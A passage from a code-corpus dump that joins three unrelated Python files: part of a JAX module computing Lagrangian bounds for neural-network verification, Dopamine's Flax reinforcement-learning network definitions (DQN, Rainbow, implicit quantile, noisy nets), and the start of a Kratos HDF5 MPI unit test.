f_inp_eval = vlin_fun(act_inp_eval)
dual_contrib = _sum_over_acts(dvar * (f_inp_eval - act_out_eval))
return dual_contrib
def bounding_fn(lag_grad: Tensor, acts: ParamSet) -> Tensor:
act_out_eval = acts[index]
      # We need to minimize the dot product between the lagrangian gradient and
      # the output of that linear layer. Because everything is linear, we can
      # take the gradient and then simply assign bounds based on the sign of
      # the gradient coefficients.
dot_lagrangian_output = lambda x: (lag_grad * vlin_fun(x)).sum()
act_inp_eval = [
acts[inp.index] if isinstance(inp, nonconvex.NonConvexBound) else inp
for inp in in_vals]
minimizing_inps = []
grads = jax.grad(dot_lagrangian_output)(act_inp_eval)
for inp, grad in zip(in_vals, grads):
if isinstance(inp, nonconvex.NonConvexBound):
broad_lb = jnp.expand_dims(inp.lower, 0)
broad_ub = jnp.expand_dims(inp.upper, 0)
minimizing_inps.append(jnp.where(grad >= 0, broad_lb, broad_ub))
else:
minimizing_inps.append(inp)
bound_contrib = _sum_over_acts((vlin_fun(minimizing_inps) - act_out_eval)
* lag_grad)
return bound_contrib
return functools.partial(cls, lagrangian_level_fn, bounding_fn)
@classmethod
def get_nonlinearity_activation_constructor(
cls: Callable[..., 'LinLagrangianNonConvexBound'],
index: Index,
act_type: str,
lb_fun: Callable[[Tensor], Tensor],
ub_fun: Callable[[Tensor], Tensor],
*inp: 'LinLagrangianNonConvexBound',
) -> Callable[..., 'LinLagrangianNonConvexBound']:
assert len(inp) == 1
assert act_type == 'Softplus' or act_type == 'ReLU'
inp = inp[0]
def lagrangian_level_fn(dvar: Tensor, acts: ParamSet) -> Tensor:
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
act_inp_eval = acts[inp.index]
act_out_eval = acts[index]
lb_val = lb_fun(act_inp_eval)
ub_val = ub_fun(act_inp_eval)
dual_contrib = _sum_over_acts(neg_dvar * (act_out_eval - ub_val)
+ pos_dvar * (lb_val - act_out_eval))
return dual_contrib
    # We consider convex monotonic activation functions, so
# - The lower bound is exact.
# - The lower/upper bound on the output can be obtained by forwarding
# through the exact function the lower/upper bound on the input.
out_lb = lb_fun(inp.lower)
out_ub = lb_fun(inp.upper)
def bounding_fn(lag_grad: Tensor, acts: ParamSet) -> Tensor:
act_out_eval = acts[index]
lb_val = jnp.expand_dims(out_lb, 0)
ub_val = jnp.expand_dims(out_ub, 0)
bound_contrib = _sum_over_acts(
jnp.maximum(lag_grad, 0.) * (lb_val - act_out_eval)
+ jnp.minimum(lag_grad, 0.) * (ub_val - act_out_eval))
return bound_contrib
return functools.partial(cls, lagrangian_level_fn, bounding_fn)
def requires_concretizing(self, consuming_primitive):
return self._concretized_bounds is None
class MinLagrangianNonConvexBound(nonconvex.NonConvexBound):
"""This subclass allows the computation of the primal minimized lagrangian.
  The contribution of each primal variable is collected by the
`lagrangian_varterms_fn`. It does not directly compute the lagrangian but
fills in a dictionary mapping variables to the terms that involve them.
This is done so that we can reorganize the lagrangian per variable, and then
minimize it one variable at a time.
"""
def __init__(self,
lagrangian_varterms_fn: LagrangianVartermsFn,
index: Index,
shape: Tuple[int, ...],
previous_bounds: Dict[Index, 'MinLagrangianNonConvexBound'],
eval_fn: Callable[EvalFunArgs, Tensor],
variables: Dict[Index, Tuple[int, ...]],
concretized_bounds: Optional[bound_propagation.Bound] = None):
"""Create a NonConvexBound that can compute the primal minimized Lagrangian.
Args:
lagrangian_varterms_fn: Function filling in a dictionary mapping each
variable to the terms involving it in the lagrangian.
index: Unique index representing the position of this activation in the
computation graph.
shape: Shape of the activations that this bound represent.
previous_bounds: Dict mapping index of activation to the bound
representing it. We need it to be able to obtain the contributions of
previous layers to the Lagrangian.
eval_fn: Function to evaluate the bound computation problem in the primal
variables: Dict mapping index of activation to the shape of variables
required to optimize them.
concretized_bounds: (Optional) Precomputed bounds for this NonConvexBound.
"""
super(MinLagrangianNonConvexBound, self).__init__(
index, shape, previous_bounds, eval_fn, variables, concretized_bounds)
self.lagrangian_varterms_fn = lagrangian_varterms_fn
def collect_lagrangian_varterms(self,
objectives: ParamSet,
dual_vars: ParamSet) -> LagrangianDict:
lagrangian_dict = collections.defaultdict(list)
for index, intermediate_bound in self.previous_bounds.items():
lagrangian_varterms_fn = intermediate_bound.lagrangian_varterms_fn
dvar = dual_vars[index]
lagrangian_varterms_fn(dvar, lagrangian_dict)
return lagrangian_dict
def dual(self, var_set: ParamSet, objectives: ParamSet) -> Tensor:
dual_vars, acts = self._compute_dualvars_nonconvexgrad(var_set, objectives)
nb_targets = objectives[self.index].shape[0]
# Compute the primals. This is not based on the activation minimizing the
    # lagrangian (because those are not necessarily primal feasible).
primals = self._objective_fn(acts, objectives)
lagrangian_terms = self.collect_lagrangian_varterms(objectives, dual_vars)
# For each item in the network, we have a list of all the terms it is
# involved in. Let's use this to minimize the lagrangian.
opt_acts = {}
for index, lag_terms in lagrangian_terms.items():
intermediate_bound = self.previous_bounds[index]
broad_lb = jnp.repeat(jnp.expand_dims(intermediate_bound.lower, axis=0),
nb_targets, axis=0)
broad_ub = jnp.repeat(jnp.expand_dims(intermediate_bound.upper, axis=0),
nb_targets, axis=0)
opt_acts[index] = _optimize_lagrangian_terms(lag_terms,
broad_lb, broad_ub)
minimized_lagrangian = self._objective_fn(opt_acts, objectives)
for index, lag_terms in lagrangian_terms.items():
for term in lag_terms:
out_term = term[1](opt_acts[index])
minimized_lagrangian = minimized_lagrangian + _sum_over_acts(out_term)
return primals, minimized_lagrangian
@classmethod
def get_initial_bound_constructor(
cls: Callable[..., 'MinLagrangianNonConvexBound'],
index: Index,
lb: Tensor,
ub: Tensor) -> Callable[..., 'MinLagrangianNonConvexBound']:
def lagrangian_varterms_fn(dvar: Tensor, lagrangian_dict: LagrangianDict):
lagrangian_dict[index].append(
('Linear', functools.partial(_initial_lagrangian_term, dvar, lb, ub)))
return functools.partial(cls, lagrangian_varterms_fn)
@classmethod
def get_linear_activation_constructor(
cls: Callable[..., 'MinLagrangianNonConvexBound'],
index: Index,
vlin_fun: Callable[..., Tensor],
in_vals: List[Union['MinLagrangianNonConvexBound', Tensor]],
) -> Callable[..., 'MinLagrangianNonConvexBound']:
def lagrangian_varterms_fn(dvar: Tensor, lagrangian_dict: LagrangianDict):
# There is a linear term of dvar over the outputs.
lagrangian_dict[index].append(('Linear', lambda x: (-dvar*x)))
      # If only one of the inputs is a variable, we can handle this in a simple
      # way. Special-casing this pattern avoids a number of failures on TPUs.
inp_is_bound = list(isinstance(inp, nonconvex.NonConvexBound)
for inp in in_vals)
if sum(inp_is_bound) == 1:
bound_arg_pos = inp_is_bound.index(True)
# The linear function has only one input, so we can just use it
# directly.
def single_input_vlin_fun(x):
inps = [inp if not is_bound else x
for inp, is_bound in zip(in_vals, inp_is_bound)]
return dvar * vlin_fun(inps)
lagrangian_dict[in_vals[bound_arg_pos].index].append(
('Linear', single_input_vlin_fun))
else:
        # There are multiple inputs, so we need to separate the contribution of
        # each one and assign the bias to only one of them.
inps = []
for inp in in_vals:
if isinstance(inp, nonconvex.NonConvexBound):
            # Add the optimization dimension and set all the entries to 0, so
            # that we can identify the bias term.
shape = inp.shape
inp_shape = (dvar.shape[0],) + shape
example_inp = jnp.zeros(inp_shape)
inps.append(example_inp)
else:
inps.append(inp)
# Get the linear term over the inputs through auto-diff
def lag_inp_contrib(x):
contrib = dvar * vlin_fun(x)
contrib = _sum_over_acts(contrib)
return contrib.sum(), contrib
(_, bias), grads = jax.value_and_grad(lag_inp_contrib,
has_aux=True)(inps)
grad_dot_prod = lambda grad, bias, x: _sum_over_acts(grad * x) + bias
for inp, grad in zip(in_vals, grads):
if isinstance(inp, nonconvex.NonConvexBound):
lagrangian_dict[inp.index].append(
('Linear', functools.partial(grad_dot_prod, grad, bias)))
# Zero out the bias now that it has been included in one term.
bias = 0. * bias
return functools.partial(cls, lagrangian_varterms_fn)
@classmethod
def get_nonlinearity_activation_constructor(
cls: Callable[..., 'MinLagrangianNonConvexBound'],
index: Index,
act_type: str,
lb_fun: Callable[[Tensor], Tensor],
ub_fun: Callable[[Tensor], Tensor],
*inp: 'MinLagrangianNonConvexBound',
) -> Callable[..., 'MinLagrangianNonConvexBound']:
assert len(inp) == 1
assert act_type == 'Softplus' or act_type == 'ReLU'
inp = inp[0]
def lagrangian_varterms_fn(dvar: Tensor, lagrangian_dict: LagrangianDict):
# There is a linear term of dvar over the outputs.
lagrangian_dict[index].append(('Linear', lambda x: (-dvar*x)))
# For the inputs, there is a linear term through the upper bound:
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
negdvar_dot_ub = lambda x: (-neg_dvar * ub_fun(x))
lagrangian_dict[inp.index].append(('Linear', negdvar_dot_ub))
      # For the inputs, there is a nonlinear term (ReLU or Softplus) through the lower bound.
lagrangian_dict[inp.index].append(
(act_type, lambda x: (pos_dvar * lb_fun(x))))
return functools.partial(cls, lagrangian_varterms_fn)
def requires_concretizing(self, consuming_primitive):
return self._concretized_bounds is None
def _optimize_lagrangian_terms(lagrangian_terms: List[LagrangianVarTerm],
lower_bound: Tensor,
upper_bound: Tensor) -> Tensor:
"""Minimize the part of the lagrangian corresponding to a given variable.
Args:
lagrangian_terms: A list of the terms involving that variable.
lower_bound: A tensor with the lower bound on the variable to optimize.
upper_bound: A tensor with the upper bound on the variable to optimize.
Returns:
opt_act: A tensor with the inputs minimizing the lagrangian terms for each
optimization target.
"""
act_term = None
# Get the total linear term
def linear_term(x):
out = 0
for term in lagrangian_terms:
if term[0] == 'Linear':
out += term[1](x).sum()
return out
# Identify the NonLinear term if there is one
for term in lagrangian_terms:
if term[0] in _lagrangian_opt_fns:
if act_term is not None:
raise ValueError('Variable involved in several activations.')
act_term = term
elif term[0] == 'Linear':
continue
else:
raise ValueError('Unexpected contribution.')
# Perform the minimization
lin_coeffs = jax.grad(linear_term)(lower_bound)
if act_term is None:
# This does not involve a non linearity, this is just a linear term
return jnp.where(lin_coeffs >= 0, lower_bound, upper_bound)
else:
return _lagrangian_opt_fns[act_term[0]](lin_coeffs, act_term[1],
lower_bound, upper_bound)
def _optimize_softplus_lagrangian(lin_coeffs: Tensor,
nonlin_term: Callable[[Tensor], Tensor],
lower_bound: Tensor,
upper_bound: Tensor) -> Tensor:
"""Compute the input minimizing a sum of a linear term and a softplus.
To minimize a * softplus(x) + b * x
Either cancel gradient is feasible:
a * (1 / (1 + exp(-x))) + b = 0
<=> a + b * (1 + exp(-x)) = 0
<=> - (a + b) / b = exp(-x)
<=> x = ln(- b / (a + b))
If b=0, this is just normal linear minimization.
If b / (a + b) > 0, that means there is no point where the gradient
cancels, which means that the minimum will be obtained at one of the
extremum. We can simply do linear minimization with the gradient.
Otherwise, the minimum is for x = ln(-b / (a+b)), clipped to valid bounds.
Args:
lin_coeffs: b in the previous equation.
nonlin_term: x -> a * softplus(x)
lower_bound: Lower bound on the input we're minimizing over.
upper_bound: Upper bound on the input we're minimizing over.
Returns:
opt_act: A tensor with the inputs minimizing the function specified.
"""
# Get the coefficients on the softplus
dummy_inp = jnp.ones_like(lower_bound)
softplus_coeffs = nonlin_term(dummy_inp) / jax.nn.softplus(dummy_inp)
grad_at_lb = lin_coeffs + softplus_coeffs * jax.nn.sigmoid(lower_bound)
# Check condition where we can disregard the 0-gradient solution
safe_denom = jnp.where(lin_coeffs + softplus_coeffs != 0,
lin_coeffs + softplus_coeffs, 1e-12)
inner_log = -lin_coeffs / safe_denom
safe_inner_log = jnp.where(inner_log > 0,
inner_log, jnp.ones_like(inner_log))
zero_grad_infeasible = jnp.any(
jnp.stack([(lin_coeffs + jnp.zeros_like(softplus_coeffs)) == 0,
lin_coeffs + softplus_coeffs == 0,
inner_log <= 0], axis=0), axis=0)
return jnp.where(zero_grad_infeasible,
jnp.where(grad_at_lb >= 0, lower_bound, upper_bound),
jnp.clip(jnp.log(safe_inner_log),
a_min=lower_bound, a_max=upper_bound))
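# Worked check of the stationary-point formula above (editor addition): with
# a = 2 and b = -1, x = ln(-b / (a + b)) = ln(1) = 0, and indeed
# a * sigmoid(0) + b = 2 * 0.5 - 1 = 0, so the gradient vanishes at x = 0.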
def _optimize_relu_lagrangian(lin_coeffs: Tensor,
nonlin_term: Callable[[Tensor], Tensor],
lower_bound: Tensor,
upper_bound: Tensor) -> Tensor:
"""Compute the input minimizing a sum of a linear term and a ReLU.
To minimize a * relu(x) + b * x,
We know that the function is piecewise linear. We will stack the three
possible solutions along axis = 0 and then keep the minimum one.
Args:
lin_coeffs: b in the previous equation.
nonlin_term: x -> a * relu(x)
lower_bound: Lower bound on the input we're minimizing over.
upper_bound: Upper bound on the input we're minimizing over.
Returns:
opt_act: A tensor with the inputs minimizing the function specified.
"""
zero_inp = jnp.zeros_like(lower_bound)
possible_inps = jnp.stack([
lower_bound,
jnp.clip(zero_inp, a_min=lower_bound, a_max=upper_bound),
upper_bound], axis=0)
out_val = lin_coeffs * possible_inps + nonlin_term(possible_inps)
choice = out_val.argmin(axis=0)
return jnp.choose(choice, possible_inps, mode='clip')
_lagrangian_opt_fns = {
'ReLU': _optimize_relu_lagrangian,
'Softplus': _optimize_softplus_lagrangian
}
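# --- Illustrative sketch (editor addition, not part of the original module).
# It exercises the (kind, fn) term format consumed by
# _optimize_lagrangian_terms; the coefficients are arbitrary.
def _example_optimize_lagrangian_terms():
  # Minimize 3 * relu(x) - 2 * x over the box [-1, 2]; the minimum is at x = 0.
  terms = [
      ('Linear', lambda x: -2.0 * x),
      ('ReLU', lambda x: 3.0 * jax.nn.relu(x)),
  ]
  lower = jnp.array([-1.0])
  upper = jnp.array([2.0])
  return _optimize_lagrangian_terms(terms, lower, upper)  # -> array([0.])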
|
dopamine/jax/networks.py | wwjiang007/dopamine | 9,825 | 11156853 | # coding=utf-8
# Copyright 2018 The Dopamine Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Various networks for Jax Dopamine agents."""
import time
from typing import Tuple, Union
from dopamine.discrete_domains import atari_lib
from flax import linen as nn
import gin
import jax
import jax.numpy as jnp
import numpy as onp
gin.constant('jax_networks.CARTPOLE_OBSERVATION_DTYPE', jnp.float64)
gin.constant('jax_networks.CARTPOLE_MIN_VALS',
(-2.4, -5., -onp.pi/12., -onp.pi*2.))
gin.constant('jax_networks.CARTPOLE_MAX_VALS',
(2.4, 5., onp.pi/12., onp.pi*2.))
gin.constant('jax_networks.ACROBOT_OBSERVATION_DTYPE', jnp.float64)
gin.constant('jax_networks.ACROBOT_MIN_VALS',
(-1., -1., -1., -1., -5., -5.))
gin.constant('jax_networks.ACROBOT_MAX_VALS',
(1., 1., 1., 1., 5., 5.))
gin.constant('jax_networks.LUNAR_OBSERVATION_DTYPE', jnp.float64)
gin.constant('jax_networks.MOUNTAINCAR_OBSERVATION_DTYPE', jnp.float64)
gin.constant('jax_networks.MOUNTAINCAR_MIN_VALS', (-1.2, -0.07))
gin.constant('jax_networks.MOUNTAINCAR_MAX_VALS', (0.6, 0.07))
def preprocess_atari_inputs(x):
"""Input normalization for Atari 2600 input frames."""
return x.astype(jnp.float32) / 255.
identity_preprocess_fn = lambda x: x
### DQN Networks ###
@gin.configurable
class NatureDQNNetwork(nn.Module):
"""The convolutional network used to compute the agent's Q-values."""
num_actions: int
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x):
initializer = nn.initializers.xavier_uniform()
if not self.inputs_preprocessed:
x = preprocess_atari_inputs(x)
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=initializer)(x)
x = nn.relu(x)
x = x.reshape((-1)) # flatten
x = nn.Dense(features=512, kernel_init=initializer)(x)
x = nn.relu(x)
q_values = nn.Dense(features=self.num_actions,
kernel_init=initializer)(x)
return atari_lib.DQNNetworkType(q_values)
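# --- Illustrative usage sketch (editor addition, not part of the original
# Dopamine module). Dopamine applies these networks to a single unbatched
# state; the (84, 84, 4) Atari frame-stack shape is an assumption here.
def _example_nature_dqn_forward():
  network_def = NatureDQNNetwork(num_actions=6)
  dummy_state = onp.zeros((84, 84, 4))
  params = network_def.init(jax.random.PRNGKey(0), x=dummy_state)
  output = network_def.apply(params, x=dummy_state)
  return output.q_values  # shape: (6,)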
@gin.configurable
class ClassicControlDQNNetwork(nn.Module):
"""Jax DQN network for classic control environments."""
num_actions: int
num_layers: int = 2
hidden_units: int = 512
min_vals: Union[None, Tuple[float, ...]] = None
max_vals: Union[None, Tuple[float, ...]] = None
inputs_preprocessed: bool = False
def setup(self):
if self.min_vals is not None:
assert self.max_vals is not None
self._min_vals = jnp.array(self.min_vals)
self._max_vals = jnp.array(self.max_vals)
initializer = nn.initializers.xavier_uniform()
self.layers = [
nn.Dense(features=self.hidden_units, kernel_init=initializer)
for _ in range(self.num_layers)]
self.final_layer = nn.Dense(features=self.num_actions,
kernel_init=initializer)
def __call__(self, x):
if not self.inputs_preprocessed:
x = x.astype(jnp.float32)
x = x.reshape((-1)) # flatten
if self.min_vals is not None:
x -= self._min_vals
x /= self._max_vals - self._min_vals
x = 2.0 * x - 1.0 # Rescale in range [-1, 1].
for layer in self.layers:
x = layer(x)
x = nn.relu(x)
q_values = self.final_layer(x)
return atari_lib.DQNNetworkType(q_values)
### Rainbow Networks ###
@gin.configurable
class RainbowNetwork(nn.Module):
"""Convolutional network used to compute the agent's return distributions."""
num_actions: int
num_atoms: int
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x, support):
initializer = nn.initializers.variance_scaling(
scale=1.0 / jnp.sqrt(3.0),
mode='fan_in',
distribution='uniform')
if not self.inputs_preprocessed:
x = preprocess_atari_inputs(x)
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=initializer)(x)
x = nn.relu(x)
x = x.reshape((-1)) # flatten
x = nn.Dense(features=512, kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Dense(features=self.num_actions * self.num_atoms,
kernel_init=initializer)(x)
logits = x.reshape((self.num_actions, self.num_atoms))
probabilities = nn.softmax(logits)
q_values = jnp.sum(support * probabilities, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
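# --- Illustrative note (editor addition): `support` is the fixed grid of
# return values used by C51; vmax = 10 below is an assumption.
#   support = jnp.linspace(-10., 10., num=51)
#   out = RainbowNetwork(num_actions=6, num_atoms=51).apply(params, x, support)
# where out.q_values = jnp.sum(support * out.probabilities, axis=1).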
@gin.configurable
class ClassicControlRainbowNetwork(nn.Module):
"""Jax Rainbow network for classic control environments."""
num_actions: int
num_atoms: int
num_layers: int = 2
hidden_units: int = 512
min_vals: Union[None, Tuple[float, ...]] = None
max_vals: Union[None, Tuple[float, ...]] = None
inputs_preprocessed: bool = False
def setup(self):
if self.min_vals is not None:
self._min_vals = jnp.array(self.min_vals)
self._max_vals = jnp.array(self.max_vals)
initializer = nn.initializers.xavier_uniform()
self.layers = [
nn.Dense(features=self.hidden_units, kernel_init=initializer)
for _ in range(self.num_layers)]
self.final_layer = nn.Dense(features=self.num_actions * self.num_atoms,
kernel_init=initializer)
def __call__(self, x, support):
if not self.inputs_preprocessed:
x = x.astype(jnp.float32)
x = x.reshape((-1)) # flatten
if self.min_vals is not None:
x -= self._min_vals
x /= self._max_vals - self._min_vals
x = 2.0 * x - 1.0 # Rescale in range [-1, 1].
for layer in self.layers:
x = layer(x)
x = nn.relu(x)
x = self.final_layer(x)
logits = x.reshape((self.num_actions, self.num_atoms))
probabilities = nn.softmax(logits)
q_values = jnp.sum(support * probabilities, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
### Implicit Quantile Networks ###
class ImplicitQuantileNetwork(nn.Module):
"""The Implicit Quantile Network (Dabney et al., 2018).."""
num_actions: int
quantile_embedding_dim: int
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x, num_quantiles, rng):
initializer = nn.initializers.variance_scaling(
scale=1.0 / jnp.sqrt(3.0),
mode='fan_in',
distribution='uniform')
if not self.inputs_preprocessed:
x = preprocess_atari_inputs(x)
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=initializer)(x)
x = nn.relu(x)
x = x.reshape((-1)) # flatten
state_vector_length = x.shape[-1]
state_net_tiled = jnp.tile(x, [num_quantiles, 1])
quantiles_shape = [num_quantiles, 1]
quantiles = jax.random.uniform(rng, shape=quantiles_shape)
quantile_net = jnp.tile(quantiles, [1, self.quantile_embedding_dim])
quantile_net = (
jnp.arange(1, self.quantile_embedding_dim + 1, 1).astype(jnp.float32)
* onp.pi
* quantile_net)
quantile_net = jnp.cos(quantile_net)
quantile_net = nn.Dense(features=state_vector_length,
kernel_init=initializer)(quantile_net)
quantile_net = nn.relu(quantile_net)
x = state_net_tiled * quantile_net
x = nn.Dense(features=512, kernel_init=initializer)(x)
x = nn.relu(x)
quantile_values = nn.Dense(features=self.num_actions,
kernel_init=initializer)(x)
return atari_lib.ImplicitQuantileNetworkType(quantile_values, quantiles)
### Quantile Networks ###
@gin.configurable
class QuantileNetwork(nn.Module):
"""Convolutional network used to compute the agent's return quantiles."""
num_actions: int
num_atoms: int
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x):
initializer = nn.initializers.variance_scaling(
scale=1.0 / jnp.sqrt(3.0),
mode='fan_in',
distribution='uniform')
if not self.inputs_preprocessed:
x = preprocess_atari_inputs(x)
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=initializer)(x)
x = nn.relu(x)
x = x.reshape((-1)) # flatten
x = nn.Dense(features=512, kernel_init=initializer)(x)
x = nn.relu(x)
x = nn.Dense(features=self.num_actions * self.num_atoms,
kernel_init=initializer)(x)
logits = x.reshape((self.num_actions, self.num_atoms))
probabilities = nn.softmax(logits)
q_values = jnp.mean(logits, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
### Noisy Nets for FullRainbowNetwork ###
@gin.configurable
class NoisyNetwork(nn.Module):
"""Noisy Network from Fortunato et al. (2018).
Attributes:
rng_key: jax.interpreters.xla.DeviceArray, key for JAX RNG.
eval_mode: bool, whether to turn off noise during evaluation.
"""
rng_key: jax.interpreters.xla.DeviceArray
eval_mode: bool = False
@staticmethod
def sample_noise(key, shape):
return jax.random.normal(key, shape)
@staticmethod
def f(x):
# See (10) and (11) in Fortunato et al. (2018).
return jnp.multiply(jnp.sign(x), jnp.power(jnp.abs(x), 0.5))
@nn.compact
def __call__(self, x, features, bias=True, kernel_init=None):
def mu_init(key, shape):
# Initialization of mean noise parameters (Section 3.2)
low = -1 / jnp.power(x.shape[0], 0.5)
high = 1 / jnp.power(x.shape[0], 0.5)
return jax.random.uniform(key, minval=low, maxval=high, shape=shape)
def sigma_init(key, shape, dtype=jnp.float32): # pylint: disable=unused-argument
# Initialization of sigma noise parameters (Section 3.2)
return jnp.ones(shape, dtype) * (0.1 / onp.sqrt(x.shape[0]))
if self.eval_mode:
# Turn off noise during evaluation
w_epsilon = onp.zeros(shape=(x.shape[0], features), dtype=onp.float32)
b_epsilon = onp.zeros(shape=(features,), dtype=onp.float32)
else:
# Factored gaussian noise in (10) and (11) in Fortunato et al. (2018).
p = NoisyNetwork.sample_noise(self.rng_key, [x.shape[0], 1])
q = NoisyNetwork.sample_noise(self.rng_key, [1, features])
f_p = NoisyNetwork.f(p)
f_q = NoisyNetwork.f(q)
w_epsilon = f_p * f_q
b_epsilon = jnp.squeeze(f_q)
# See (8) and (9) in Fortunato et al. (2018) for output computation.
w_mu = self.param('kernel_mu', mu_init, (x.shape[0], features))
w_sigma = self.param('kernel_sigma', sigma_init, (x.shape[0], features))
w = w_mu + jnp.multiply(w_sigma, w_epsilon)
ret = jnp.matmul(x, w)
b_mu = self.param('bias_mu', mu_init, (features,))
b_sigma = self.param('bias_sigma', sigma_init, (features,))
b = b_mu + jnp.multiply(b_sigma, b_epsilon)
return jnp.where(bias, ret + b, ret)
### FullRainbowNetwork ###
def feature_layer(key, noisy, eval_mode=False):
"""Network feature layer depending on whether noisy_nets are used on or not."""
def noisy_net(x, features):
return NoisyNetwork(rng_key=key, eval_mode=eval_mode)(x, features)
def dense_net(x, features):
return nn.Dense(features, kernel_init=nn.initializers.xavier_uniform())(x)
return noisy_net if noisy else dense_net
@gin.configurable
class FullRainbowNetwork(nn.Module):
"""Jax Rainbow network for Full Rainbow.
Attributes:
num_actions: int, number of actions the agent can take at any state.
num_atoms: int, the number of buckets of the value function distribution.
noisy: bool, Whether to use noisy networks.
dueling: bool, Whether to use dueling network architecture.
distributional: bool, whether to use distributional RL.
"""
num_actions: int
num_atoms: int
noisy: bool = True
dueling: bool = True
distributional: bool = True
inputs_preprocessed: bool = False
@nn.compact
def __call__(self, x, support, eval_mode=False, key=None):
# Generate a random number generation key if not provided
if key is None:
key = jax.random.PRNGKey(int(time.time() * 1e6))
if not self.inputs_preprocessed:
x = preprocess_atari_inputs(x)
hidden_sizes = [32, 64, 64]
kernel_sizes = [8, 4, 3]
stride_sizes = [4, 2, 1]
for hidden_size, kernel_size, stride_size in zip(hidden_sizes, kernel_sizes,
stride_sizes):
x = nn.Conv(
features=hidden_size,
kernel_size=(kernel_size, kernel_size),
strides=(stride_size, stride_size),
kernel_init=nn.initializers.xavier_uniform())(x)
x = nn.relu(x)
x = x.reshape((-1)) # flatten
net = feature_layer(key, self.noisy, eval_mode=eval_mode)
x = net(x, features=512) # Single hidden layer of size 512
x = nn.relu(x)
if self.dueling:
adv = net(x, features=self.num_actions * self.num_atoms)
value = net(x, features=self.num_atoms)
adv = adv.reshape((self.num_actions, self.num_atoms))
value = value.reshape((1, self.num_atoms))
logits = value + (adv - (jnp.mean(adv, axis=0, keepdims=True)))
else:
x = net(x, features=self.num_actions * self.num_atoms)
logits = x.reshape((self.num_actions, self.num_atoms))
if self.distributional:
probabilities = nn.softmax(logits)
q_values = jnp.sum(support * probabilities, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
q_values = jnp.sum(logits, axis=1) # Sum over all the num_atoms
return atari_lib.DQNNetworkType(q_values)
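# --- Illustrative usage sketch (editor addition, not part of the original
# Dopamine module). The support grid mirrors the Rainbow example above, and
# passing `key` explicitly avoids the time-based fallback inside __call__.
#
#   net = FullRainbowNetwork(num_actions=6, num_atoms=51)
#   support = jnp.linspace(-10., 10., num=51)
#   state = onp.zeros((84, 84, 4))
#   rng = jax.random.PRNGKey(0)
#   params = net.init(rng, x=state, support=support, key=rng)
#   out = net.apply(params, x=state, support=support, key=rng)
#   # out.q_values has shape (6,)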
|
applications/HDF5Application/tests/test_hdf5_core_mpi.py | lkusch/Kratos | 778 | 11156857 |
import KratosMultiphysics
import KratosMultiphysics.HDF5Application as KratosHDF5
from KratosMultiphysics.HDF5Application import core
from KratosMultiphysics.HDF5Application.core import operations, file_io
import KratosMultiphysics.KratosUnittest as KratosUnittest
from KratosMultiphysics.HDF5Application.core.utils import ParametersWrapper
from unittest.mock import patch, MagicMock
import test_hdf5_core
class TestFileIO(KratosUnittest.TestCase):
def test_HDF5ParallelFileIO_Creation(self):
io = file_io._HDF5ParallelFileIO()
test_hdf5_core.TestFileIO._BuildTestFileIOObject(io)
obj = io.Get('kratos.h5')
self.assertIsInstance(obj, KratosHDF5.HDF5FileParallel)
class TestOperations(KratosUnittest.TestCase):
def test_PartitionedModelPartOutput(self):
settings = ParametersWrapper()
settings['operation_type'] = 'partitioned_model_part_output'
partitioned_model_part_output = operations.Create(settings)
self.assertTrue(settings.Has('operation_type'))
self.assertTrue(settings.Has('prefix'))
with patch('KratosMultiphysics.HDF5Application.core.operations.KratosHDF5.HDF5PartitionedModelPartIO') as p:
partitioned_model_part_io = p.return_value
model_part = test_hdf5_core._SurrogateModelPart()
hdf5_file = MagicMock(spec=KratosHDF5.HDF5FileParallel)
partitioned_model_part_output(model_part, hdf5_file)
p.assert_called_once_with(hdf5_file, '/ModelData')
partitioned_model_part_io.WriteModelPart.assert_called_once_with(
model_part)
def test_PartitionedModelPartOutput_NonTerminalPrefix(self):
settings = ParametersWrapper('''
{
"operation_type": "partitioned_model_part_output",
"prefix": "/ModelData/<model_part_name>/<time>",
"time_format": "0.2f"
}
''')
partitioned_model_part_output = operations.Create(settings)
with patch('KratosMultiphysics.HDF5Application.core.operations.KratosHDF5.HDF5PartitionedModelPartIO', autospec=True) as p:
model_part = test_hdf5_core._SurrogateModelPart()
hdf5_file = MagicMock(spec=KratosHDF5.HDF5FileParallel)
partitioned_model_part_output(model_part, hdf5_file)
args, _ = p.call_args
